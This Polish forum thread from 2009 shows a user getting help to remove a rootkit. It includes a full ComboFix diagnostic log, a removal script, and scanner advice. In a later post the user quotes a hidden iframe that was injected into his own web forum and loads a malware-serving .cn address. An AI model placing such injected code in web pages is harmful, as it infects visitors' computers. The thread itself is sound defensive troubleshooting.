Arczi Napisano 1 Maja 2009 Zgłoś Napisano 1 Maja 2009 Witam, korzystam z Kaspersky Internet Security 2009. Wczoraj chodze sobie po necie, a tu nagle wyskoczyło jakieś powiadomienie w Kasperskym: Od wczoraj wyskakuje to co jakiś czas... zauważyłem też dziwne zachowanie internetu, raz chodzi normalnie, a po chwili w ogóle jest jakiś chwilowy przestój... Na screenie jest BN12.tmp, ale te cyfry przy BN się zmieniają. Jest też plik I386SI.SYS, ale często pojawią się też netsik.sys. Próbowałem usunąć cały folder Temp (bo w tym folderze są te pliki) w trybie awaryjnym. Usunąłem, ale gdy normalnie włączyłem kompa, to znów są te błędy... Pomoże ktoś ? Cytuj Udostępnij tę odpowiedź Odnośnik do odpowiedzi Udostępnij na innych stronach More sharing options...
Kolobos Napisano 1 Maja 2009 Zgłoś Napisano 1 Maja 2009 To rootkit, daj log z combofix. Cytuj Udostępnij tę odpowiedź Odnośnik do odpowiedzi Udostępnij na innych stronach More sharing options...
Arczi Napisano 1 Maja 2009 Zgłoś Napisano 1 Maja 2009 ComboFix 09-04-30.05 - Artur 2009-05-01 12:06.2 - NTFSx86Microsoft Windows XP Professional 5.1.2600.3.1250.48.1045.18.2047.1599 [GMT 2:00]Uruchomiony z: c:\documents and settings\Artur\Pulpit\ComboFix.exeAV: Kaspersky Internet Security *On-access scanning disabled* (Updated)FW: Kaspersky Internet Security *enabled*UWAGA - TEN KOMPUTER NIE MA ZAINSTALOWANEJ KONSOLI ODZYSKIWANIA !!.((((((((((((((((((((((((((((((((((((((( Usunięto ))))))))))))))))))))))))))))))))))))))))))))))))).c:\documents and settings\Artur\Artur.exec:\documents and settings\Artur\Dane aplikacji\EurekaLogc:\documents and settings\Artur\Dane aplikacji\EurekaLog\EurekaLog.ini.---- Poprzednie uruchomienie -------.c:\program files\myglobalsearchc:\program files\myglobalsearch\bar\History\searchc:\windows\system32\digiwet.dll.((((((((((((((((((((((((( Pliki utworzone od 2009-04-01 do 2009-05-01 ))))))))))))))))))))))))))))))).2009-05-01 09:25 . 2009-05-01 09:25 30056 ----a-w c:\documents and settings\Artur\cc_20090501_112455.reg2009-04-30 13:24 . 2009-04-30 13:25 30464 ----a-w c:\windows\system32\drivers\ws2_32sik.sys.(((((((((((((((((((((((((((((((((((((((( Sekcja Find3M )))))))))))))))))))))))))))))))))))))))))))))))))))).2009-05-01 10:07 . 2008-08-03 16:25 663584 --sha-w c:\windows\system32\drivers\fidbox2.dat2009-05-01 10:07 . 2008-08-03 16:25 6492 --sha-w c:\windows\system32\drivers\fidbox2.idx2009-05-01 10:03 . 2008-08-03 16:06 384 ----a-w c:\windows\system32\DVCStateBkp-{00000004-00000000-00000002-00001102-00000004-20061102}.dat2009-05-01 10:03 . 2008-08-03 16:06 384 ----a-w c:\windows\system32\DVCState-{00000004-00000000-00000002-00001102-00000004-20061102}.dat2009-05-01 10:03 . 2008-08-03 16:25 2731040 --sha-w c:\windows\system32\drivers\fidbox.dat2009-05-01 10:03 . 2008-08-03 16:25 26608 --sha-w c:\windows\system32\drivers\fidbox.idx2009-05-01 06:15 . 2008-08-03 17:40 136888 ----a-w c:\windows\system32\drivers\PnkBstrK.sys2009-05-01 06:15 . 2008-08-03 17:40 66872 ----a-w c:\windows\system32\PnkBstrA.exe2009-05-01 06:15 . 2008-08-03 17:40 111928 ----a-w c:\windows\system32\PnkBstrB.exe2009-04-22 18:08 . 2008-08-05 15:16 -------- d-----w c:\program files\Java2009-04-05 19:42 . 2008-08-03 15:28 -------- d--h--w c:\program files\InstallShield Installation Information2009-03-29 07:45 . 2001-10-26 14:15 82010 ----a-w c:\windows\system32\perfc015.dat2009-03-29 07:45 . 2001-10-26 14:15 484634 ----a-w c:\windows\system32\perfh015.dat2009-03-24 06:40 . 2008-08-03 16:25 -------- d-----w c:\program files\Kaspersky Internet Security 20092009-03-14 09:49 . 2009-03-14 09:49 -------- d-----w c:\program files\Winamp2009-03-09 03:19 . 2008-11-28 13:28 410984 ----a-w c:\windows\system32\deploytk.dll2009-02-05 15:25 . 2008-01-29 16:29 33808 ----a-w c:\windows\system32\drivers\klbg.sys2009-02-03 18:50 . 2008-08-03 16:25 89601 ----a-w c:\windows\system32\drivers\klick.dat2009-02-03 18:50 . 2008-08-03 16:25 101287 ----a-w c:\windows\system32\drivers\klin.dat.((((((((((((((((((((((((((((((((((((( Wpisy startowe rejestru ))))))))))))))))))))))))))))))))))))))))))))))))))..*Uwaga* puste wpisy oraz domyślne, prawidłowe wpisy nie są pokazane REGEDIT4[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]"DAEMON Tools Lite"="g:\daemon tools lite\daemon.exe" [2008-07-24 490952]"ctfmon.exe"="c:\windows\system32\ctfmon.exe" [2004-08-03 15360][HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]"CTSysVol"="c:\program files\Creative\Surround Mixer\CTSysVol.exe" [2003-09-17 57344]"AVP"="c:\program files\Kaspersky Internet Security 2009\avp.exe" [2009-02-05 201992]"NeroFilterCheck"="c:\windows\system32\NeroCheck.exe" [2001-07-09 155648]"NvCplDaemon"="c:\windows\system32\NvCpl.dll" [2008-12-02 13680640]"NvMediaCenter"="c:\windows\system32\NvMcTray.dll" [2008-12-02 86016]"RivaTunerStartupDaemon"="g:\rivatuner v2.11\RivaTuner.exe" [2008-09-16 2715648]"QuickTime Task"="c:\program files\QuickTime\QTTask.exe" [2008-01-10 385024]"SunJavaUpdateSched"="c:\program files\Java\jre6\bin\jusched.exe" [2009-03-09 148888]"CTHelper"="CTHELPER.EXE" - c:\windows\system32\CTHELPER.EXE [2003-06-19 24576]"AsioReg"="CTASIO.DLL" - c:\windows\system32\CTASIO.DLL [2003-06-19 118784]"nwiz"="nwiz.exe" - c:\windows\system32\nwiz.exe [2008-12-02 1657376][HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run]"CTFMON.EXE"="c:\windows\system32\CTFMON.EXE" [2004-08-03 15360]c:\documents and settings\All Users\Menu Start\Programy\Autostart\Adobe Reader Speed Launch.lnk - c:\program files\Adobe\Acrobat 7.0\Reader\reader_sl.exe [2005-9-24 29696][HKEY_LOCAL_MACHINE\software\microsoft\security center\Monitoring\KasperskyAntiVirus]"DisableMonitoring"=dword:00000001[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile]"EnableFirewall"= 0 (0x0)[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile\AuthorizedApplications\List]"%windir%\\system32\\sessmgr.exe"="c:\\Documents and Settings\\All Users\\Dane aplikacji\\Kaspersky Lab Setup Files\\Kaspersky Internet Security 2009\\Polish\\setup.exe"="c:\\WINDOWS\\system32\\PnkBstrA.exe"="c:\\WINDOWS\\system32\\PnkBstrB.exe"="d:\\Call of Duty 4 - Modern Warfare\\iw3mp.exe"="d:\\FlatOut Ultimate Carnage\\Fouc.exe"="c:\\Program Files\\uTorrent\\uTorrent.exe"="d:\\Call of Duty - World at War\\CoDWaWmp.exe"="d:\\Call of Duty - World at War\\CoDWaW.exe"="d:\\GTA 4\\Rockstar Games Social Club\\RGSCLauncher.exe"="d:\\GTA 4\\Grand Theft Auto IV\\LaunchGTAIV.exe"="c:\\Program Files\\MSN Messenger\\msnmsgr.exe"="c:\\Program Files\\MSN Messenger\\livecall.exe"="d:\\Tom Clancy's H.A.W.X\\HAWX.exe"="c:\\WINDOWS\\system32\\userinit.exe"=[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile\GloballyOpenPorts\List]"25488:TCP"= 25488:TCP:BitComet 25488 TCP"25488:UDP"= 25488:UDP:BitComet 25488 UDPR2 amd64si;amd64si; [x]R2 ati64si;ati64si; [x]R2 systemntmi;systemntmi; [x]S0 klbg;Kaspersky Lab Boot Guard Driver;c:\windows\system32\drivers\klbg.sys [2009-02-05 33808]S2 PfDetNT;PfDetNT;c:\windows\system32\drivers\PfModNT.sys [2003-03-05 15840]S3 KLFLTDEV;Kaspersky Lab KLFltDev;c:\windows\system32\DRIVERS\klfltdev.sys [2008-03-13 26640]S3 klim5;Kaspersky Anti-Virus NDIS Filter;c:\windows\system32\DRIVERS\klim5.sys [2008-03-25 24592][HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{72de2e4d-6bb0-11dd-91d0-001fc63765ad}]\Shell\AutoRun\command - K:\m9ma.exe\Shell\explore\Command - K:\m9ma.exe\Shell\open\Command - K:\m9ma.exe.- - - - USUNIĘTO PUSTE WPISY - - - -HKCU-Run-Artur - c:\documents and settings\Artur\Artur.exe.------- Skan uzupełniający -------.uStart Page = hxxp://www.wp.pl/IE: Dodaj do listy blokowanych banerów - c:\program files\Kaspersky Internet Security 2009\ie_banner_deny.htmIE: E&ksportuj do programu Microsoft Excel - c:\progra~1\MICROS~2\Office12\EXCEL.EXE/3000IE: Pasek Narzędzi RoboForm - file://c:\program files\Siber Systems\AI RoboForm\RoboFormComShowToolbar.htmlIE: Personalizuj Menu - file://c:\program files\Siber Systems\AI RoboForm\RoboFormComCustomizeIEMenu.htmlIE: Wypełnij Pola - file://c:\program files\Siber Systems\AI RoboForm\RoboFormComFillForms.htmlIE: Zapisz Pola - file://c:\program files\Siber Systems\AI RoboForm\RoboFormComSavePass.htmlFF - ProfilePath - c:\documents and settings\Artur\Dane aplikacji\Mozilla\Firefox\Profiles\8r3sioc4.default\FF - prefs.js: browser.startup.homepage - www.wp.plFF - plugin: c:\program files\Mozilla Firefox\plugins\npganymedenet.dllFF - plugin: c:\program files\Mozilla Firefox\plugins\npOggX.dllFF - plugin: c:\program files\Opera\program\plugins\npdivx32.dllFF - plugin: c:\program files\VistaCodecPack\rm\browser\plugins\nppl3260.dllFF - plugin: c:\program files\VistaCodecPack\rm\browser\plugins\nprpjplug.dll.**************************************************************************catchme 0.3.1398 W2K/XP/Vista - rootkit/stealth malware detector by Gmer, http://www.gmer.netRootkit scan 2009-05-01 12:07Windows 5.1.2600 Dodatek Service Pack 3 NTFSskanowanie ukrytych procesów ... skanowanie ukrytych wpisów autostartu ...skanowanie ukrytych plików ... skanowanie pomyślnie ukończoneukryte pliki: 0**************************************************************************.--------------------- Pliki DLL ładowane pod uruchomionymi procesami ---------------------- - - - - - - > 'winlogon.exe'(1092)c:\windows\system32\klogon.dll.Czas ukończenia: 2009-05-01 12:08ComboFix-quarantined-files.txt 2009-05-01 10:08Przed: 2 158 227 456 bajtów wolnychPo: 6 157 299 712 bajtów wolnych144 Cytuj Udostępnij tę odpowiedź Odnośnik do odpowiedzi Udostępnij na innych stronach More sharing options...
Kolobos Napisano 1 Maja 2009 Zgłoś Napisano 1 Maja 2009 Podlacz zainfekowane nosniki i uzyj Flash Disinfector. Zrob skan przy pomocy Dr.Web Cureit oraz Malwarebytes Anti-Malware. Uzyj CFScript.txt z combofix: File:: c:\windows\system32\drivers\ws2_32sik.sys Driver:: amd64si ati64si systemntmi Registry:: [-HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{72de2e4d-6bb0-11dd-91d0-001fc63765ad}] Po wykonaniu daj log z combofix, ktory sie utworzy. Na koniec zablokuj dostep do klucza mountpoints2: http://www.searchengines.pl/Infekcje-z-pen...ych-t94761.html (punkt 3 z sekcji zapobieganie). Cytuj Udostępnij tę odpowiedź Odnośnik do odpowiedzi Udostępnij na innych stronach More sharing options...
Arczi Napisano 2 Maja 2009 Zgłoś Napisano 2 Maja 2009 Sory że dopiero teraz odpisuje, ale wczoraj mnie nie było. Problem jest taki, że wtedy nie podłączałem żadnych nośników, ani nic... Cytuj Udostępnij tę odpowiedź Odnośnik do odpowiedzi Udostępnij na innych stronach More sharing options...
Kolobos Napisano 2 Maja 2009 Zgłoś Napisano 2 Maja 2009 Problem jest taki, ze nie wykonales tego co napisalem, a to czy podlaczales nosnik w chwili infekcji nie ma znaczenia skoro jest zarobaczony. Cytuj Udostępnij tę odpowiedź Odnośnik do odpowiedzi Udostępnij na innych stronach More sharing options...
Arczi Napisano 3 Maja 2009 Zgłoś Napisano 3 Maja 2009 (edytowane) Włączyłęm tego Flash Disinfectora, pokazał się komunikat że prosze podłączyć wszystkie zainfekowane urządzenia (pendrive itd) i kliknąć na OK. Ja nie podłączałem nic, kliknąłem na "OK", i po chwili pokazało się tylko "DONE". Dr. Web nic nie wykazał, a Malwarebytes Anti-Malware wykazał: Wszystkie 4 pliki usunąłem. Tutaj log combofixa z cfsript: http://wklej.org/id/85753/ Został jeden plik: c:\windows\system32\acelpdecn.exe którego ręcznie usunąłem. Mountpoints2 również zablokowałem. Wygląda na to, że na moim komputerze już chyba wszystko powróciło do dawnego porządku. Pojawił się jednak inny problem, nie wiem czy spowodowany zawirusowaniem mojego kompa, czy "od tak". Mianowicie wczoraj na moim forum działy się dziwne rzeczy. Na początku nie można było się w ogóle zalogować oraz forum strasznie się rozjechało. Po wejściu na stronę wywalają różne wirusy, a w kodzie było dopisane: <iframe src="http://liteautotop.cn/ts/in.cgi?mozila" width=2 height=4 style="visibility: hidden"></iframe> Od razu przeskanowałem całego kompa poprzez pełne skanowanie Kasperskym, wykrył pare zainfekowanych plików, lecz z tym też już zrobiłem porządek. Znalazłem fajną instrukcję dotyczącą tej infekcji. Jednak zrobiłem wszystko tak jak tam napisali - przeskanowałem komputer tym Anti-Malware, pozmieniałem hasła do ftp, bazy danych oraz do forum, wywaliłem ten kod który był dopisany, a mimo to podczas ładowania forum dalej widzę, jak na pasku stanu szybko wczytują się jakieś adresy xxx.cn.... Edit: Właśnie podczas wejścia na moje forum, była chwilowa zwiecha, a potem włączył się Acrobat Reader... Edytowane 3 Maja 2009 przez Arczi Cytuj Udostępnij tę odpowiedź Odnośnik do odpowiedzi Udostępnij na innych stronach More sharing options...
Kolobos Napisano 3 Maja 2009 Zgłoś Napisano 3 Maja 2009 (edytowane) Odinstaluj Adobe Reader lub usun wtyczki, ktore doinstalowal do przegladarek i ustaw pobieranie plikow pdf zamiast autmatycznego otwierania (sa stosowne wtyczki do ff). Co do strony to musisz usunac infekcje ze wszystkich plikow, odrobaczyc komputer, nie uzywac Total Commandera, sprawdzic pliki .htaccess na koncie strony, na koniec zmienic haslo do strony. Edytowane 3 Maja 2009 przez Kolobos Cytuj Udostępnij tę odpowiedź Odnośnik do odpowiedzi Udostępnij na innych stronach More sharing options...